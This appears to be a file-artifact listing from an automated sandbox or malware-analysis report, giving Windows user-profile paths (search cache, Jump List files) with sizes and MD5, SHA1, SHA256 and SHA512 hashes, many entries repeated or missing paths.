C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{6D809377-6AF0-444B-8957-A3773F02200E}_Java_jre1_8_0_66_bin_javacpl_exe
Filesize 36KB
MD5 8aaad0f4eb7d3c65f81c6e6b496ba889
SHA1 231237a501b9433c292991e4ec200b25c1589050
SHA256 813c66ce7dec4cff9c55fb6f809eab909421e37f69ff30e4acaa502365a32bd1
SHA512 1a83ce732dc47853bf6e8f4249054f41b0dea8505cda73433b37dfa16114f27bfed3b4b3ba580aa9d53c3dcc8d48bf571a45f7c0468e6a0f2a227a7e59e17d62
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133340180543279630.txt
Filesize 75KB
MD5 531cc66733871fcd169442abd46a8bd9
SHA1 1b6827ae7a22f35340ee56ff42a194a2e2538bf2
SHA256 a212b2d6bd6f7f8549ca86316262616f9f7fed4fcae3186dd8ba6d2706835402
SHA512 fb2224b74b5f463d50b0a49a14dd65f9cd865e5988db7a237f9e2b6fd256370d18f8596a862773ef709b54a6d76cc52c36e5c06332e5d8db3bef26427e3257c6
-
C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\CAAHQQ1W\microsoft.windows[1].xml
Filesize 96B
MD5 6424805af3b71a828b3134d791979bbd
SHA1 62368d1bd11c73e236dc3888b14b359b7260af6f
SHA256 598e353da6c20a1ed5831bb4f929a414cbaf73d8fefde29ed99819faa35e7595
SHA512 784d9494fd7e5c70f5b4f2e8b2b736ab55b94b7df0be741c003ee79875aa50bc9ce1275cc51ac358e9947cdc17c71d794faab152d2ebe4d357dd8aa9d2114a30
-
C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\CAAHQQ1W\microsoft.windows[1].xml
Filesize 96B
MD5 6424805af3b71a828b3134d791979bbd
SHA1 62368d1bd11c73e236dc3888b14b359b7260af6f
SHA256 598e353da6c20a1ed5831bb4f929a414cbaf73d8fefde29ed99819faa35e7595
SHA512 784d9494fd7e5c70f5b4f2e8b2b736ab55b94b7df0be741c003ee79875aa50bc9ce1275cc51ac358e9947cdc17c71d794faab152d2ebe4d357dd8aa9d2114a30
-
C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\CAAHQQ1W\microsoft.windows[1].xml
Filesize 96B
MD5 6424805af3b71a828b3134d791979bbd
SHA1 62368d1bd11c73e236dc3888b14b359b7260af6f
SHA256 598e353da6c20a1ed5831bb4f929a414cbaf73d8fefde29ed99819faa35e7595
SHA512 784d9494fd7e5c70f5b4f2e8b2b736ab55b94b7df0be741c003ee79875aa50bc9ce1275cc51ac358e9947cdc17c71d794faab152d2ebe4d357dd8aa9d2114a30
-
Filesize 94KB
MD5 14ff402962ad21b78ae0b4c43cd1f194
SHA1 f8a510eb26666e875a5bdd1cadad40602763ad72
SHA256 fb9646cb956945bdc503e69645f6b5316d3826b780d3c36738d6b944e884d15b
SHA512 daa7a08bf3709119a944bce28f6ebdd24e54a22b18cd9f86a87873e958df121a3881dcdd5e162f6b4e543238c7aef20f657c9830df01d4c79290f7c9a4fcc54b
-
Filesize 94KB
MD5 14ff402962ad21b78ae0b4c43cd1f194
SHA1 f8a510eb26666e875a5bdd1cadad40602763ad72
SHA256 fb9646cb956945bdc503e69645f6b5316d3826b780d3c36738d6b944e884d15b
SHA512 daa7a08bf3709119a944bce28f6ebdd24e54a22b18cd9f86a87873e958df121a3881dcdd5e162f6b4e543238c7aef20f657c9830df01d4c79290f7c9a4fcc54b
-
Filesize 1KB
MD5 25b307c39e69b94d9d9a3ab59eaf3250
SHA1 37b0403ef89e05ec8bb69a84a6c9e77606581816
SHA256 8343254162b8a597bc6daf93e4bf689657c74d05072dd98e548b81123e242bc5
SHA512 74e092d2eb4f416909048bceb84794373c0ce486cf48966dbd07b85c4ef87b776a00c0647b5c626de250756c1566562cb8466b4a621f60a8780c8af693f0f539
-
Filesize 5.4MB
MD5 1f3d3851380d1158329842419d9124a0
SHA1 e3e7b94632322eb70a54dfe0f7be1d91263831ed
SHA256 0557f385de60e9114c4eb74d9aa5631b537e42fe576329e6365093b1ea956991
SHA512 f3d495c117ce672ccb361880c055e5f74c293d55b4f94b87020ab1453fb6d3043c15f417fbc2ff552770d3b8379a7a3062edb496d9d9a69088e245afee2b54a2
-
Filesize 60B
MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize 91KB
MD5 17d1a593f7481f4a8cf29fb322d6f472
SHA1 a24d8e44650268f53ca57451fe564c92c0f2af35
SHA256 f837127a9ca8fb7baed06ec5a6408484cb129e4e33fa4dc6321097240924078c
SHA512 8c6617cceb98c0d42abea528419038f3d8ffc9001fc6a95ce8706d587365132b7b905d386a77767f3b6984bbce4fd2f43d9615a6dd695ee70c9fac938f130849
-
Filesize 5.8MB
MD5 c4b8578d2354c38613669b1c82a08ccb
SHA1 f6b0353977350e42d6a4f09f887c41b51c1adf6e
SHA256 3297bc041d9579715b6724204059f5cdc0bcfcbfaa2548b8daaf7ad90e0e82d2
SHA512 903d6520c0bd968ca7854bde2edce0c0191592d29050762b00c35c8d25c28304100955cf9ba2956f2c8905f572c7ea67c0b2494622745e82a8a5511146ea9a73
-
Filesize 444KB
MD5 32b9404c781c7e14e32755a98d93b608
SHA1 40803b89f251543a6647feced5f326e00985aa29
SHA256 87fa9e84016da0aafdb7f530a093f7f961e2826c6d80c4be25bdbc830c635f97
SHA512 79d4c75d058dcce5157bcbb1d527fa341b662a099dc507599e944ec836d06e74609f0551f21407ae3a93bcff1efcc5940d355c0a72289d0c71d7ce98888d932f
-
Filesize 1.5MB
MD5 27543547fa480422e56e0b4cdbb09488
SHA1 35f701bc2c43a308098251d9d413e64e52176fc2
SHA256 9664dde8876d8c83375bb227bfebabb53acbbd4920a88acf100ec7ca6c0bc664
SHA512 a2efa21a27ef67df01578eb4903b8adc852fa682dc168512b4547536d67d801cad0a25af570e0d085f9d4b340a569c964a4cead05e3f8114b5f2b2d659b7a4b2
-
Filesize 60KB
MD5 3bac7893c9fd8069f8da8d14c1191257
SHA1 8b1bd55f1d77bc15ab4082324bdc0f684ba6da53
SHA256 5f9191012621c4784df56bd0949c46c7eb1d4d67bece5c43b4099f5facd1f29a
SHA512 5950a919acbca7f1f5baf6d4764e78bf5475812dc34f501f407895a658be86610eae0b66dd69475621abb4c251862813d083421d156b431faf32feab2ca8c0c7
-
Filesize 267B
MD5 14bb9d57a9897e2e4313aa462c96e6b9
SHA1 9f29cffe57e14f89bbf3323933483bd207c33529
SHA256 7ee00d18df0c6b972b4b0138f73a2163f304e052811530ae4d0d51b800367be2
SHA512 1a04482cd456b115dd9af5b0b97ab15adf51b6f454d5e53f5239f6dec3cff09f01b0e8f39df3e9a8324a054557b70a7c6db05d0eb9d6516de87da95b8def87a8
-
Filesize 195B
MD5 e26f3dc7dd25e77636064f9cce98401b
SHA1 05152475ac249a3c649478d88ea5f581c3dbafcf
SHA256 32a73c6086053f221237b90477a3047cc90b19fd5a9c856d48e627665b293f55
SHA512 35654c6dd6b215d662f48fbe7553fa15812875034ad23e60d2dd58a6e4759bcce0e0f97fc7489091bcec562e8f821b6f290e99ef9558b8da90d9da2897e4a7f2
-
Filesize 1KB
MD5 b70192bdfa82953d23893557b94122f2
SHA1 4fd73efd6a6b28f57df1dde6a4241526c5b0fb60
SHA256 6443d3bc34cc48e858c4fdb3ab0ad9a433705f266cb70f92886e90cbf589eab4
SHA512 6dcb0273ffe6675af850d0a5e1976d9e8f8e9d6306a21856b1df4d8c0fef38fb8ff28f113e8c8b923c6451e32e734c514a15f79efe6316f180874f78608928da
-
Filesize 793KB
MD5 835d21dc5baa96f1ce1bf6b66d92d637
SHA1 e0fb2a01a9859f0d2c983b3850c76f8512817e2d
SHA256 e67f2b34ef647d59eb8ebd4a88f85dc072346ca5c275cba1ee2307b80a560319
SHA512 747a9b6cde0207c722a62904a2c8708188f7c9e65e94cf55667e90096f1d1852e145061bd8e764bf30aaca0fb0f4355668feccc951041af735677c4c644aba87
-
Filesize 793KB
MD5 835d21dc5baa96f1ce1bf6b66d92d637
SHA1 e0fb2a01a9859f0d2c983b3850c76f8512817e2d
SHA256 e67f2b34ef647d59eb8ebd4a88f85dc072346ca5c275cba1ee2307b80a560319
SHA512 747a9b6cde0207c722a62904a2c8708188f7c9e65e94cf55667e90096f1d1852e145061bd8e764bf30aaca0fb0f4355668feccc951041af735677c4c644aba87
-
Filesize 793KB
MD5 835d21dc5baa96f1ce1bf6b66d92d637
SHA1 e0fb2a01a9859f0d2c983b3850c76f8512817e2d
SHA256 e67f2b34ef647d59eb8ebd4a88f85dc072346ca5c275cba1ee2307b80a560319
SHA512 747a9b6cde0207c722a62904a2c8708188f7c9e65e94cf55667e90096f1d1852e145061bd8e764bf30aaca0fb0f4355668feccc951041af735677c4c644aba87
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\5f7b5f1e01b83767.automaticDestinations-ms
Filesize 10KB
MD5 f4e2076b704d68d14a8dc8962b01fcdd
SHA1 64f53c8f56907e325bbbfe8bf80d7854830e7e4c
SHA256 0d258f28b00038ec0bf3d372fcd13d2d898a0599442d14ddfded147b14dae35b
SHA512 0552b6d8ed646b1efaf804f5f3a996935f778027590254c0ad6f8ef559c61759f0ec4f6ba9c228e01df9409d9b33add5bd7acd7e0e996d898f2bf8e8d8f13672
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
Filesize 13KB
MD5 4591abd904703b787033979885577ad9
SHA1 c530fbd8d3206b3c3c58b62a3cef884c716e4fcf
SHA256 8fe39a549ab0dcb2dca1b55da912a4014df8e53e89d6dd17a2ecfbaef4eceba9
SHA512 6eab0e970abef0bb251c48cdcb946b9477ede42d758aa8e5ca2fe2f170afc9cb25d294e44b21306f5962ec1677063c89a9f7fd83c0e845d75b38d2c9968263e6
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
Filesize 14KB
MD5 2fd1f68d68bf83f29740885004a42a05
SHA1 3545c9b9344ebaf5a654c877c90a09e393c50572
SHA256 c54dbb07ece2eca5abc361ba973172702524f5cb5de83efca12d0f53a90dd793
SHA512 b7fc0c49a01244d729debe7a3c3116884d211415c6e4edb9c8979409fbe685a361d698b1cbfe335a4669ab18668dd0c4438d3fabe9f3f477cb1da8477a40cb7a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
Filesize 14KB
MD5 7bffc149c48df51d3ba046ff2f51fc1c
SHA1 dda9ecc508560368eb7a13113048114f0bcbe19b
SHA256 f1c0e289fbd33d9fc0700b36c219c6d2e943318c0e79e4561938f9cb8e83b3eb
SHA512 d77a697449dcafa4ed51fc8106139e30378d836e0eee85cd1dc44947005a8ef0b7f8fed746aa9be0200b5363ba49a82b0704af6f162af4f19f9cb001890ae685
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
Filesize 18KB
MD5 a579c89996a91add77f39a954c8c9b2e
SHA1 f1bf99ba89408d30d1f9d3d3f08fed9f37238fca
SHA256 47b8d8637f4f756482f9eb4b558dff6d7bf481dfdc52d21b8fac7a0129951418
SHA512 b62cfb413d3e5e3017472ac0d77c2ef3d67c0bd07c30eb288a6aba23752377aa62139ff26be1b1fe558832b375a129ea03974c0e480fe9fb1e0ecad30fbf9e3e
-
Filesize 72KB
MD5 a58fc4577a6ad1b5223b74b902ab2a30
SHA1 ec7aae56284d77242a23d79c6293bfcd43817742
SHA256 2ea59dfd6ea0663e384552cfd224bec8ffbd67c6b2dbd815401bd9e835f1b015
SHA512 b73498e37e9599e340644c05d547c4641b04f09e004a3fa2dc77e641fe4f12259599f21af6365f8cdc8ea863e222dbb8f36fdd652a1350fd3a8b38262dcbe4f5
-
Filesize 147KB
MD5 32a8742009ffdfd68b46fe8fd4794386
SHA1 de18190d77ae094b03d357abfa4a465058cd54e3
SHA256 741e1a8f05863856a25d101bd35bf97cba0b637f0c04ecb432c1d85a78ef1365
SHA512 22418d5e887a6022abe8a7cbb0b6917a7478d468d211eecd03a95b8fb6452fc59db5178573e25d5d449968ead26bb0b2bfbfada7043c9a7a1796baca5235a82b
-
Filesize 1.2MB
MD5 8ef41798df108ce9bd41382c9721b1c9
SHA1 1e6227635a12039f4d380531b032bf773f0e6de0
SHA256 bc07ff22d4ee0b6fafcc12482ecf2981c172a672194c647cedf9b4d215ad9740
SHA512 4c62af04d4a141b94eb3e1b0dbf3669cb53fe9b942072ed7bea6a848d87d8994cff5a5f639ab70f424eb79a4b7adabdde4da6d2f02f995bd8d55db23ce99f01b
-
Filesize 361KB
MD5 e3143e8c70427a56dac73a808cba0c79
SHA1 63556c7ad9e778d5bd9092f834b5cc751e419d16
SHA256 b2f57a23ecc789c1bbf6037ac0825bf98babc7bf0c5d438af5e2767a27a79188
SHA512 74e0f4b55625df86a87b9315e4007be8e05bbecca4346a6ea06ef5b1528acb5a8bb636ef3e599a3820dbddcf69563a0a22e2c1062c965544fd75ec96fd9803fc
-
Filesize 1.7MB
MD5 dc28d546b643c5a33c292ae32d7cf43b
SHA1 b1f891265914eea6926df765bce0f73f8d9d6741
SHA256 20dcc4f50eb47cafda7926735df9ef8241598b83e233066ea495d4b8aa818851
SHA512 9d8c1bb61b6f564044aad931e685387df9bc00a92ab5efe7191b94a3d45c7d98a6f71d8ae5668252d6a7b5b44ab6704464d688772aedac8bdb2773d5765d4d56
-
Filesize 7.0MB
MD5 b7a300c6953f42f199c2ff903feac72f
SHA1 8f7d38270d33ae7f1b1fa49cd03ecfc63576a8b8
SHA256 f40b8ef92f828123c81a8b275ab0e29e44b44b3a175e452eea72a475f6cfaf80
SHA512 80ef310b54e8c54b80649651acb58c07251bdcf1cde9ead0b85123fee2922e40958a78cc029bb28a69c8ea993952c4cf973b4448b9d24580c535a7460dfbca47
-
Filesize 7.0MB
MD5 b7a300c6953f42f199c2ff903feac72f
SHA1 8f7d38270d33ae7f1b1fa49cd03ecfc63576a8b8
SHA256 f40b8ef92f828123c81a8b275ab0e29e44b44b3a175e452eea72a475f6cfaf80
SHA512 80ef310b54e8c54b80649651acb58c07251bdcf1cde9ead0b85123fee2922e40958a78cc029bb28a69c8ea993952c4cf973b4448b9d24580c535a7460dfbca47
-
Filesize 183B
MD5 66f09a3993dcae94acfe39d45b553f58
SHA1 9d09f8e22d464f7021d7f713269b8169aed98682
SHA256 7ea08548c23bd7fd7c75ca720ac5a0e8ca94cb51d06cd45ebf5f412e4bbdd7d7
SHA512 c8ea53ab187a720080bd8d879704e035f7e632afe1ee93e7637fad6bb7e40d33a5fe7e5c3d69134209487d225e72d8d944a43a28dc32922e946023e89abc93ed
-
Filesize 24.3MB
MD5 809fa0ce52950e65983d16bcc3803900
SHA1 ad8cb46e4f49ddf05c167ce63bf3e449c3bfe25a
SHA256 657863a210016af574c75b32f00c012d47c3d96f53734dd5aa1b69d33256283e
SHA512 3243db58db3f6fd67f58652b112dca78ce1111d57814ca29a62e7dcdecb296a06e0b22a3b08652cb11b49e058bff6914cd8da8877a0c918b7e35988f5f3b23df
-
Filesize 24.3MB
MD5 809fa0ce52950e65983d16bcc3803900
SHA1 ad8cb46e4f49ddf05c167ce63bf3e449c3bfe25a
SHA256 657863a210016af574c75b32f00c012d47c3d96f53734dd5aa1b69d33256283e
SHA512 3243db58db3f6fd67f58652b112dca78ce1111d57814ca29a62e7dcdecb296a06e0b22a3b08652cb11b49e058bff6914cd8da8877a0c918b7e35988f5f3b23df
-
Filesize 40KB
MD5 1b17dc0a383a40825ac21337ce31cd0b
SHA1 fac0e76c443cda0576705058c11ca3ecd4f68968
SHA256 f5e997ef0c3a32a46ec68b6fef96a440d5ee8ace3015610a9fc6f9700980c81b
SHA512 3c0a0d5175c50139f54b1cfe4dbd69019d92940fdc314e9bbe612a71b850ba0c986ca6dd8ead6515ec2f05631f19bc0bc47de2dd6a429eea4cc756f49e506d95
-
Filesize 40KB
MD5 1b17dc0a383a40825ac21337ce31cd0b
SHA1 fac0e76c443cda0576705058c11ca3ecd4f68968
SHA256 f5e997ef0c3a32a46ec68b6fef96a440d5ee8ace3015610a9fc6f9700980c81b
SHA512 3c0a0d5175c50139f54b1cfe4dbd69019d92940fdc314e9bbe612a71b850ba0c986ca6dd8ead6515ec2f05631f19bc0bc47de2dd6a429eea4cc756f49e506d95
-
Filesize 6.5MB
MD5 a21db5b6e09c3ec82f048fd7f1c4bb3a
SHA1 e7ffb13176d60b79d0b3f60eaea641827f30df64
SHA256 67d9b4b35c02a19ab364ad19e1972645eb98e24dcd6f1715d2a26229deb2ccf5
SHA512 7caab4f21c33ef90c1104aa7256504ee40ff0a36525b15eb3d48940862346ccf90a16eef87c06d79b0ffd920beb103ed380eae45df8c9286768890b15ed1067c
-
Filesize 6.5MB
MD5 a21db5b6e09c3ec82f048fd7f1c4bb3a
SHA1 e7ffb13176d60b79d0b3f60eaea641827f30df64
SHA256 67d9b4b35c02a19ab364ad19e1972645eb98e24dcd6f1715d2a26229deb2ccf5
SHA512 7caab4f21c33ef90c1104aa7256504ee40ff0a36525b15eb3d48940862346ccf90a16eef87c06d79b0ffd920beb103ed380eae45df8c9286768890b15ed1067c
-
Filesize 6.5MB
MD5 a21db5b6e09c3ec82f048fd7f1c4bb3a
SHA1 e7ffb13176d60b79d0b3f60eaea641827f30df64
SHA256 67d9b4b35c02a19ab364ad19e1972645eb98e24dcd6f1715d2a26229deb2ccf5
SHA512 7caab4f21c33ef90c1104aa7256504ee40ff0a36525b15eb3d48940862346ccf90a16eef87c06d79b0ffd920beb103ed380eae45df8c9286768890b15ed1067c
-
Filesize 6.5MB
MD5 a21db5b6e09c3ec82f048fd7f1c4bb3a
SHA1 e7ffb13176d60b79d0b3f60eaea641827f30df64
SHA256 67d9b4b35c02a19ab364ad19e1972645eb98e24dcd6f1715d2a26229deb2ccf5
SHA512 7caab4f21c33ef90c1104aa7256504ee40ff0a36525b15eb3d48940862346ccf90a16eef87c06d79b0ffd920beb103ed380eae45df8c9286768890b15ed1067c
-
Filesize 24.3MB
MD5 c62c2acc11b0b428811596a106b4b515
SHA1 5ef29c1bf32ad7c4a3d7400e8d06247e2b920409
SHA256 ac8caebe03bc2c3c903e6ceaa1020c1d362d4f8524d7c4f18670cba802f4f598
SHA512 adff2d54a4cc7d9e8b6fad20f001558e5cdf343595dcc504e6be50eadc37b05f4b9fc4bef95808825adf801640997f889b019a5b2b466a644358443a7d5e7a3a
-
Filesize 793KB
MD5 835d21dc5baa96f1ce1bf6b66d92d637
SHA1 e0fb2a01a9859f0d2c983b3850c76f8512817e2d
SHA256 e67f2b34ef647d59eb8ebd4a88f85dc072346ca5c275cba1ee2307b80a560319
SHA512 747a9b6cde0207c722a62904a2c8708188f7c9e65e94cf55667e90096f1d1852e145061bd8e764bf30aaca0fb0f4355668feccc951041af735677c4c644aba87
-
Filesize 793KB
MD5 835d21dc5baa96f1ce1bf6b66d92d637
SHA1 e0fb2a01a9859f0d2c983b3850c76f8512817e2d
SHA256 e67f2b34ef647d59eb8ebd4a88f85dc072346ca5c275cba1ee2307b80a560319
SHA512 747a9b6cde0207c722a62904a2c8708188f7c9e65e94cf55667e90096f1d1852e145061bd8e764bf30aaca0fb0f4355668feccc951041af735677c4c644aba87